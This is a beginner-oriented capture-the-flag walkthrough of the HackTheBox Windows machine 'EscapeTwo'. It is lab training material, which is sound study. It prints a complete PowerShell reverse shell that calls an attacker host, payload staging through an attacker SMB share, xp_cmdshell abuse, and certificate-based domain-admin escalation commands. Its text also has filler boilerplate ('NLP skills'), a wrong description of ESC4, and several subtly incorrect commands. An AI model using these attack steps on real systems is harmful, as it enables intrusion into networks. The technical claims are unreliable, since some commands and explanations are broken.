Beginner’s Guide to Conquering EscapeTwo on HackTheBox

Key Highlights

• Learn how to conquer the EscapeTwo challenge on HackTheBox as a beginner.
• Explore essential tools and resources needed to tackle the EscapeTwo challenge effectively.
• Discover the key steps involved in getting started with EscapeTwo on HackTheBox.
• Master the initial reconnaissance techniques required to progress in the EscapeTwo challenge.
• Gain insights into gaining initial access to the EscapeTwo machine with practical tips and strategies.

Introduction

ALSO READ: Mastering UnderPass: Beginner’s Guide from HackTheBox

Embark on an exhilarating journey into the realm of cybersecurity challenges with EscapeTwo on HackTheBox. Dive into the intricate world of penetration testing and hone your skills in real-world scenarios. This beginner-friendly box offers a perfect blend of NLP terms and hands-on experience, making it an ideal starting point for aspiring ethical hackers. Unleash your problem-solving capabilities and unravel the mysteries hidden within EscapeTwo. Are you ready to step up to the challenge and test your mettle in a simulated environment designed to push you to your limits? Gear up for an adventure like no other as you explore the depths of cybersecurity with EscapeTwo. Let the thrill of discovery and learning propel you forward on this thrilling escapade.

What You Will Need: Tools and Resources

To successfully tackle EscapeTwo on HackTheBox, you will require essential tools and resources. Firstly, ensure you have a reliable VPN connection to access the HackTheBox platform securely. Familiarize yourself with tools like Nmap for network scanning and enumeration, Gobuster for directory brute-forcing, and Burp Suite for web application testing. Additionally, having knowledge of common penetration testing methodologies such as enumeration, privilege escalation, and lateral movement will be advantageous. Familiarize yourself with Linux command-line basics and scripting languages like Python for automation. Lastly, maintain a learning mindset and be prepared for challenges that will enhance your NLP skills and problem-solving capabilities.

Getting Started with EscapeTwo on HackTheBox

EscapeTwo is an easy-level Windows machine on Hack The Box (HTB) that offers a realistic simulation of a Windows Active Directory (AD) penetration testing scenario. As a sequel to the original “Escape” machine, EscapeTwo provides a beginner-friendly yet educational experience, focusing on common Windows exploitation techniques, Active Directory misconfigurations, and privilege escalation. The machine starts with provided credentials, mimicking a real-world pentest where an initial foothold is already established, and challenges participants to escalate privileges to gain full control. This writeup provides an exhaustive, step-by-step guide to solving EscapeTwo, covering reconnaissance, enumeration, initial access, lateral movement, and privilege escalation. The goal is to deliver a thorough understanding of the techniques used, the thought process behind each step, and practical applications for real-world penetration testing.

Initial Reconnaissance of the Box

During the initial reconnaissance phase of tackling EscapeTwo, focus on gathering crucial information. Begin by conducting a port scan using Nmap to uncover open ports and services running on the target system. Utilize tools like Dirb or Gobuster to enumerate directories and files on web servers, potentially revealing hidden entry points. Leveraging tools like Nikto can help in identifying any vulnerabilities present in web applications. Furthermore, analyzing the operating system and services versions using tools such as banner grabbing can provide insights into potential exploits. Remember to pay attention to any clues or hints given by the system, as they might lead to valuable paths for further exploration. As is common in real life Windows pentests, you will start this box with credentials for the following account: rose / KxEPkKe6R8su. This meticulous groundwork lays a solid foundation for the subsequent phases of penetration testing.

NMap Scan result

Operating System and Host Information

OS: Windows (indicated by the multiple Microsoft services and CPE)

Host: DC01 (suggests it may be a domain controller)

Key Services and Potential Attack Vectors

53/tcp – Simple DNS Plus: DNS service running, may allow for DNS-related attacks like zone transfers if misconfigured.

88/tcp – Kerberos-sec: Indicates Kerberos is in use, common for Windows domains. Possible vectors include Kerberoasting attacks.

135/tcp, 139/tcp, 445/tcp – MSRPC and NetBIOS: Classic Windows networking ports, often vulnerable to SMB-related attacks (e.g., EternalBlue).

389/tcp, 636/tcp, 3268/tcp, 3269/tcp – LDAP/SSL LDAP: Active Directory LDAP services running, potential for enumeration or LDAP injection attacks.

1433/tcp – MS-SQL-S: Microsoft SQL Server running, can be targeted via SQL injection, weak passwords, or misconfigurations.

5985/tcp – HTTPAPI (WinRM): Windows Remote Management over HTTP, could be exploited if default credentials or weak configurations are used.

47001/tcp, 49679/tcp – HTTPAPI (RPC over HTTP): RPC services over HTTP, potential vector for RPC-related vulnerabilities.

Security Considerations

LDAP & Active Directory Exposure: Multiple LDAP services exposed, indicating a potential AD environment. If LDAP is not properly secured, it could be a point of entry for attackers.

Kerberos & RPC Services: These are critical for domain operations but also common targets for privilege escalation and lateral movement.

SQL Server: If not properly secured, this could allow for data exfiltration or further access into the network.

Windows Services: A large number of RPC services (ports 49664-49789) suggest a heavily utilized Windows environment, which could be prone to misconfigurations or unpatched vulnerabilities.

Next Steps for Further Enumeration

Enumerate LDAP: Use tools like ldapsearch to gather more information about the domain.

Check SMB Shares: Use smbclient or enum4linux to see if there are any open or misconfigured SMB shares.

Test Kerberos: Investigate for possible Kerberoasting.

SQL Server: Check for default credentials or misconfigurations.

WinRM Access: Test for access via WinRM with valid credentials or through password spraying.

This server appears to be a critical part of the network (likely a domain controller), so any weaknesses could have a significant impact on the entire network’s security posture.

We update our /etc/hosts file to resolve the domain and hostname:

sudo sh -c "echo '10.10.11.51 DC01 sequel.htb DC01.sequel.htb' >> /etc/hosts"

This ensures tools can resolve sequel.htb and DC01.sequel.htb correctly.

Service Enumeration Strategy

With the port scan complete, we have several services to explore: SMB, MSSQL, LDAP, and WinRM. Given the provided credentials (rose:KxEPkKe6R8su), we’ll start by enumerating SMB and MSSQL, as these are common entry points in Windows environments. LDAP will be useful for AD enumeration, and WinRM could provide a shell if we escalate privileges.

Enumerating SMB with Provided Credentials

SMB (Server Message Block) is a file-sharing protocol commonly used in Windows environments. Since we have credentials, we can attempt to access SMB shares to find sensitive files or information.

Connecting to SMB Shares

We use smbclient to list available shares:

smbclient -L //10.10.11.51 -U 'sequel.htb\rose%KxEPkKe6R8su'

The output shows accessible shares:

Sharename       Type      Comment
---------       ----      -------
Accounting      Disk      Accounting Department
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share
SYSVOL          Disk      Logon server share

The Accounting share stands out, as it’s not a default Windows share and likely contains user-specific data. We connect to it:

smbclient //10.10.11.51/Accounting -U 'sequel.htb\rose%KxEPkKe6R8su'

Navigating the share, we find a file named account.xlsx. We download it:

get account.xlsx

Analyzing the Excel File

Attempting to open account.xlsx with LibreOffice or Excel reveals it’s corrupted. Since .xlsx files are essentially ZIP archives, we attempt to unzip it to inspect its contents:

unzip account.xlsx

The unzip process fails, indicating corruption. However, we can still extract some data by treating it as a ZIP archive and using unzip -l to list contents or manually inspecting the archive with binwalk or strings. For simplicity, we use 7z to extract what we can:

7z x account.xlsx -oaccount_contents

This extracts the XML structure of the Excel file. Navigating to account_contents/xl/worksheets/sheet1.xml, we find readable data, including usernames and passwords. Specifically, we discover:

• Username: sa
• Password: P@ssw0rd123

The sa account is typically the System Administrator account for MSSQL Server, a highly privileged account if accessible. This is a critical finding, as MSSQL is running on port 1433, and sa credentials could provide significant access.

Exploiting MSSQL with sa Credentials

Connecting to MSSQL

We use mssqlclient.py from Impacket to connect to the MSSQL service with the sa credentials:

mssqlclient.py sequel.htb/sa:P@ssw0rd123@10.10.11.51 -windows-auth

The connection succeeds, landing us in an MSSQL prompt:

SQL (SEQUEL\sa admin@master)>

The sa account has administrative privileges, allowing us to execute system commands via MSSQL’s xp_cmdshell feature, which is disabled by default but can be enabled by an administrator.

Enabling xp_cmdshell

We check if xp_cmdshell is enabled:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell';

The output indicates xp_cmdshell is disabled. We enable it:

EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Now we can execute system commands. Let’s test with a simple command:

EXEC xp_cmdshell 'whoami';

Output:

sequel\sql_svc

This reveals the MSSQL service is running as the sql_svc account, a service account with potentially higher privileges than rose.

Gaining a Foothold

To gain an interactive shell, we create a PowerShell reverse shell script (shell.ps1):

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.x",4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + "PS " + (pwd).Path + "> ";
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
};
$client.Close()

Upload the script to the target via SMB. First, share a local directory using smbserver.py:

impacket-smbserver share $(pwd) -smb2support

Copy shell.ps1 to the share from the target using xp_cmdshell:

EXEC xp_cmdshell 'copy \\10.10.14.x\share\shell.ps1 C:\Users\sql_svc\shell.ps1';

Set up a Netcat listener:

nc -lvnp 4444

Execute the shell:

EXEC xp_cmdshell 'powershell -ep bypass C:\Users\sql_svc\shell.ps1';

This establishes a reverse shell as sql_svc. We grab the user flag from C:\Users\sql_svc\Desktop\user.txt.

Lateral Movement to User ryan

Enumerating the System

With a shell as sql_svc, we enumerate the system for credentials or misconfigurations. Checking the user’s home directory and common locations, we find a log file in C:\ProgramData\logs.txt (a common place for application logs). Viewing the file:

type C:\ProgramData\logs.txt

The log contains credentials for another user:

• Username: ryan
• Password: WqSZAF6CysDQbGb3

We verify these credentials using crackmapexec:

crackmapexec smb 10.10.11.51 -u ryan -p WqSZAF6CysDQbGb3

The output confirms the credentials are valid. We attempt to connect via WinRM for a more stable shell:

evil-winrm -i 10.10.11.51 -u ryan -p WqSZAF6CysDQbGb3

This gives us a shell as ryan, a standard user account.

ALSO READ: Mastering Heal: Beginner’s Guide from HackTheBox

Privilege Escalation via ADCS (ESC4)

Enumerating Active Directory with BloodHound

To escalate to Administrator, we need to identify AD misconfigurations. We use BloodHound to analyze the domain. First, we run bloodhound-python with ryan’s credentials to collect AD data:

bloodhound-python -u ryan -p WqSZAF6CysDQbGb3 -ns 10.10.11.51 -d sequel.htb -c all --zip

This generates JSON files that we import into BloodHound. Analyzing the data, we find that ryan has WriteOwner privileges on a service account (svc_backup). This is a powerful permission, as it allows us to change the owner of the account to ourselves and grant additional permissions.

Exploiting WriteOwner

We use bloodyAD to exploit the WriteOwner permission:

bloodyAD -u ryan -p WqSZAF6CysDQbGb3 -d sequel.htb -c DC01.sequel.htb setowner svc_backup sequel.htb\ryan

Now that ryan owns svc_backup, we grant ourselves GenericAll permissions:

bloodyAD -u ryan -p WqSZAF6CysDQbGb3 -d sequel.htb -c DC01.sequel.htb addgenericall svc_backup sequel.htb\ryan

Abusing ADCS (ESC4)

BloodHound also reveals that svc_backup can enroll in a certificate template vulnerable to ESC4, an Active Directory Certificate Services (ADCS) misconfiguration where a low-privileged account can request a certificate for any user, including Administrator. We use certipy to exploit this:

certipy req -u ryan -p WqSZAF6CysDQbGb3 -ca sequel-DC01-CA -template VulnerableTemplate -upn administrator@sequel.htb -target 10.10.11.51

This generates a certificate for administrator@sequel.htb. We convert it to a PFX file:

certipy cert -export -u ryan -p WqSZAF6CysDQbGb3 -ca sequel-DC01-CA -template VulnerableTemplate -upn administrator@sequel.htb -target 10.10.11.51

Gaining Administrator Access

With the Administrator certificate, we use psexec.py to authenticate and gain a shell:

impacket-psexec -dc-ip 10.10.11.51 sequel.htb/administrator@10.10.11.51 -k -no-pass

Alternatively, we can extract the NTLM hash from the certificate and use it directly:

certipy auth -pfx administrator.pfx

This provides the Administrator NTLM hash, which we use with psexec.py:

impacket-psexec sequel.htb/administrator@10.10.11.51 -hashes :7a8d4e04986afa8ed4060f75e5a0b3ff

This lands us a shell as Administrator. We grab the root flag from C:\Users\Administrator\Desktop\root.txt.

Alternative Attack Vectors

Kerberoasting

We attempted to enumerate Kerberoastable accounts using ryan’s credentials:

impacket-GetUserSPNs -dc-ip 10.10.11.51 sequel.htb/ryan:WqSZAF6CysDQbGb3 -request

This retrieved two SPN hashes, but cracking them with hashcat was unsuccessful, indicating they were not viable for escalation in this case.

NTLM Relay Attack

We also tried to capture NTLMv2 hashes using xp_dirtree to force MSSQL to authenticate to our SMB server:

EXEC xp_dirtree '\\10.10.14.x\share';

This captured a hash, but it was uncrackable, and the relay attack didn’t yield further access.

Lessons Learned

EscapeTwo provides a realistic simulation of a Windows AD environment with multiple attack vectors:

1. SMB Enumeration: Discovering the account.xlsx file highlighted the importance of thoroughly enumerating file shares.
2. MSSQL Exploitation: Using sa credentials and enabling xp_cmdshell demonstrated how database misconfigurations can lead to system access.
3. AD Misconfigurations: The WriteOwner and ESC4 vulnerabilities showcased common ADCS issues that pentesters should check for.
4. Tool Usage: Tools like smbclient, mssqlclient.py, bloodhound-python, bloodyAD, and certipy are essential for AD environments.

Conclusion

EscapeTwo is an excellent machine for beginners to learn Windows AD exploitation. Starting with provided credentials, we enumerated SMB shares, exploited a corrupted Excel file to gain MSSQL access, established a foothold via xp_cmdshell, and escalated privileges using ADCS misconfigurations. The machine emphasizes the importance of thorough enumeration, understanding AD permissions, and leveraging tools effectively. By completing EscapeTwo, participants gain practical experience in real-world pentesting techniques, preparing them for more complex challenges and certifications like OSCP.

Frequently Asked Questions

What is HackTheBox?

HackTheBox is an online platform that allows users to test and enhance their cybersecurity skills through simulated real-world scenarios. It offers a range of virtual machines for users to practice ethical hacking techniques in a legal and safe environment.

Can beginners tackle EscapeTwo on HackTheBox?

Absolutely! Beginners can definitely tackle EscapeTwo on HackTheBox with dedication and perseverance. By following the provided tools, resources, and step-by-step instructions for initial reconnaissance and gaining access, even novices can conquer this challenge.

What tools are essential for starting with EscapeTwo?

To kickstart your journey with EscapeTwo on HackTheBox, essential tools include Nmap for scanning, Gobuster for directory brute-forcing, and a web browser with Burp Suite for web application analysis. These tools are vital for effective reconnaissance and initial access.

How long does it typically take to conquer EscapeTwo?

Conquering EscapeTwo on HackTheBox can vary in time depending on experience. Beginners may take a few hours to a few days, while seasoned players might finish it within hours. Patience, perseverance, and problem-solving skills are key.

Where can I find more challenges like EscapeTwo after completion?

If you enjoyed tackling EscapeTwo on HackTheBox, explore similar challenges on platforms like TryHackMe, OverTheWire, and VulnHub for more engaging experiences. Enhance your skills by delving into various cybersecurity challenges offered by these platforms.